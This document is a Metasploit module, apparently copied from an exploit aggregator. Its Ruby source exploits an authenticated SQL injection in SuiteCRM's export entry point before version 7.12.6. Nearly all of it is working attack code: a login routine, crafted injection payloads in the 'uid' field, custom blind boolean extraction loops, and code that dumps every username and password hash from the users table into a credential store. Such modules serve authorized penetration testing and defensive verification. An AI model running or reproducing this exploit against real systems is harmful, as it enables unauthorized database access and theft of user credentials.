Share
## https://sploitus.com/exploit?id=MSF:AUXILIARY-GATHER-SUITE_CRM_EXPORT_SQLI-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::SQLi
  include Msf::Exploit::Remote::HttpClient

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SuiteCRM authenticated SQL injection in export functionality',
        'Description' => %q{
          This module exploits an authenticated SQL injection in SuiteCRM in versions before 7.12.6. The vulnerability
          allows an authenticated attacker to send specially crafted requests to the export entry point of the application in order
          to retrieve all the usernames and their associated password from the database.
        },
        'Author' => [
          'Exodus Intelligence', # Advisory
          'jheysel-r7', # poc + msf module
          'Redouane NIBOUCHA <rniboucha@yahoo.fr>' # sql injection help
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://blog.exodusintel.com/2022/06/09/salesagility-suitecrm-export-request-sql-injection-vulnerability/'],
          ['URL', 'https://docs.suitecrm.com/admin/releases/7.12.x/#_7_12_6']
        ],
        'Actions' => [
          ['Dump credentials', { 'Description' => 'Dumps usernames and passwords from the users table' }]
        ],
        'DefaultAction' => 'Dump credentials',
        'DisclosureDate' => '2022-05-24',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        },
        'Privileged' => true
      )
    )
    register_options [
      OptInt.new('COUNT', [false, 'Number of users to enumerate', 3]),
      OptString.new('USERNAME', [true, 'Username of user', '']),
      OptString.new('PASSWORD', [true, 'Password for user', '']),
    ]
  end

  def check
    authenticated = authenticate
    return Exploit::CheckCode::Safe('Unable to authenticate to SuiteCRM') unless authenticated

    res = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri, 'index.php'),
        'keep_cookies' => true,
        'vars_get' => {
          'module' => 'Home',
          'action' => 'About'
        }
      }
    )

    return Exploit::CheckCode::Safe('Trying to query the SuiteCRM version information failed') unless res&.body

    version = Rex::Version.new(res.body.match(/Version\s+((?:\d+\.)+\d+).*/)[1])
    return Exploit::CheckCode::Safe('Could not find retrieve the version of SuiteCRM from the version page') unless version

    print_status "Version detected: #{version}"

    return Exploit::CheckCode::Vulnerable if version <= Rex::Version.new('7.12.5')

    Exploit::CheckCode::Safe
  end

  def authenticate
    print_status("Authenticating as #{datastore['USERNAME']}")
    initial_req = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri, 'index.php'),
        'keep_cookies' => true,
        'vars_get' => {
          'module' => 'Users',
          'action' => 'Login'
        }
      }
    )

    return false unless initial_req && initial_req.code == 200 && initial_req.body.include?('SuiteCRM') && initial_req.get_cookies.include?('sugar_user_theme=')

    login = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri, 'index.php'),
        'keep_cookies' => true,
        'vars_post' => {
          'module' => 'Users',
          'action' => 'Authenticate',
          'return_module' => 'Users',
          'return_action' => 'Login',
          'user_name' => datastore['USERNAME'],
          'username_password' => datastore['PASSWORD'],
          'Login' => 'Log In'
        }
      }
    )

    return false unless login && login.code == 302 && login.headers['Location'] == 'index.php?module=Home&action=index' && login.get_cookies.include?('sugar_user_theme=')

    res = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri, 'index.php'),
        'keep_cookies' => true,
        'vars_get' => {
          'module' => 'Administration',
          'action' => 'index'
        }
      }
    )

    if res && res.code == 200 && res.body.include?('SuiteCRM') && res.get_cookies.include?('sugar_user_theme=') && res.body.include?('SUGAR.unifiedSearchAdvanced')
      print_good("Authenticated as: #{datastore['USERNAME']}")
      true
    else
      print_error("Failed to authenticate as: #{datastore['USERNAME']}")
      false
    end
  end

  # This module sends this same request multiple times. In order to reduce code it has beed moved it into it's owm method
  def send_injection_request_cgi(payload)
    res = send_request_cgi({
      'method' => 'POST',
      'keep_cookies' => true,
      'uri' => normalize_uri(target_uri.path, 'index.php?entryPoint=export'),
      'encode_params' => false,
      'vars_post' => {
        'uid' => payload,
        'module' => 'Accounts',
        'action' => 'index'
      }
    })

    if res&.code != 200
      fail_with(Failure::UnexpectedReply, "The server did not respond to the request with the payload: #{payload}")
    end
    res
  end

  # @return an array of usernames
  def get_user_names(sqli)
    print_status 'Fetching Users, please wait...'
    users = sqli.run_sql('select group_concat(DISTINCT user_name) from users')
    users.split(',')
  end

  # Use blind boolean SQL injection to determine the user_hashes of given usernames
  def get_user_hashes(sqli, users)
    print_status 'Fetching Hashes, please wait...'
    hashes = []
    number_of_users = users.size
    users.each_with_index do |username, index|
      hash = sqli.run_sql("select user_hash from users where user_name='#{username}'")
      hashes << [username, hash]
      print_good "(#{index + 1}/#{number_of_users}) Username : #{username} ; Hash : #{hash}"
      create_credential({
        workspace_id: myworkspace_id,
        origin_type: :service,
        module_fullname: fullname,
        username: username,
        private_type: :nonreplayable_hash,
        jtr_format: identify_hash(hash),
        private_data: hash,
        service_name: 'SuiteCRM',
        address: datastore['RHOSTS'],
        port: datastore['RPORT'],
        protocol: 'tcp',
        status: Metasploit::Model::Login::Status::UNTRIED
      })
    end
    hashes
  end

  def init_sqli
    wrong_resp_length = send_injection_request_cgi(',\\,))+AND+1=2;+--+')&.body&.length
    fail_with(Failure::UnexpectedReply, 'The server responded unexpectedly to a request sent with uid: ",\\,))+AND+1=2;+--+"') unless wrong_resp_length
    sqli = create_sqli(dbms: MySQLi::BooleanBasedBlind, opts: { hex_encode_strings: true }) do |payload|
      fail_with(Failure::BadConfig, 'comma in payload') if payload.include?(',')
      resp_length = send_injection_request_cgi(",\\,))+OR+(#{payload});+--+")&.body&.length
      resp_length != wrong_resp_length
    end

    # redefine blind_detect_length and blind_dump_data because of the bad characters the payload cannot include

    def sqli.blind_detect_length(query, _timebased)
      output_length = 0
      min_length = 0
      max_length = 800
      loop do
        break if blind_request("length(cast((#{query}) as binary))=#{output_length}")

        flag = blind_request("length(cast((#{query}) as binary))+BETWEEN+#{output_length}+AND+#{max_length}")
        if flag
          min_length = output_length + 1
          if max_length - min_length <= 1
            if blind_request("length(cast((#{query}) as binary))=#{min_length}")
              output_length = min_length
              break
            elsif blind_request("length(cast((#{query}) as binary))=#{max_length}")
              output_length = max_length
              break
            else
              fail_with(Failure::UnexpectedReply, 'Somehow this got messed up!')
            end
          end
          output_length = (min_length + max_length) / 2 + 1
        else
          max_length = output_length
          output_length = (min_length + max_length) / 2 - 1
        end
      end
      output_length
    end

    def sqli.blind_dump_data(query, length, _known_bits, _bits_to_guess, _timebased)
      output = [ ]
      position = 1
      length.times do |_j|
        character_value = 0
        min_value = 0
        max_value = 1000
        loop do
          break if blind_request("(select ascii(substr((#{query}) from #{position} for 1)))=#{character_value}")

          flag = blind_request("(select ascii(substr((#{query}) from #{position} for 1)))+BETWEEN+#{character_value}+AND+#{max_value}")
          if flag
            min_value = character_value + 1
            if max_value - min_value <= 1
              if blind_request("(select ascii(substr((#{query}) from #{position} for 1)))=#{min_value}")
                character_value = min_value
                break
              elsif blind_request("(select ascii(substr((#{query}) from #{position} for 1)))=#{max_value}")
                character_value = max_value
                break
              else
                fail_with(Failure::UnexpectedReply, 'Somehow this got messed up!')
              end
            end
            character_value = (min_value + max_value) / 2 + 1
          else
            max_value = character_value
            character_value = (min_value + max_value) / 2 - 1
          end
        end

        position += 1
        output << character_value
      end
      output.map(&:chr).join
    end

    sqli
  end

  def run
    unless datastore['AutoCheck']
      authenticated = authenticate
      fail_with(Failure::NoAccess, 'Unable to authenticate to SuiteCRM') unless authenticated
    end

    sqli = init_sqli
    users = get_user_names(sqli)

    user_table = Rex::Text::Table.new(
      'Header' => 'SuiteCRM User Names',
      'Indent' => 1,
      'Columns' => ['Username']
    )

    users.each do |user|
      user_table << [user]
    end

    print_line user_table.to_s
    creds = get_user_hashes(sqli, users)
    creds_table = Rex::Text::Table.new(
      'Header' => 'SuiteCRM User Credentials',
      'Indent' => 1,
      'Columns' => ['Username', 'Hash']
    )

    creds.each do |cred|
      creds_table << [cred[0], cred[1]]
    end
    print_line creds_table.to_s
  end
end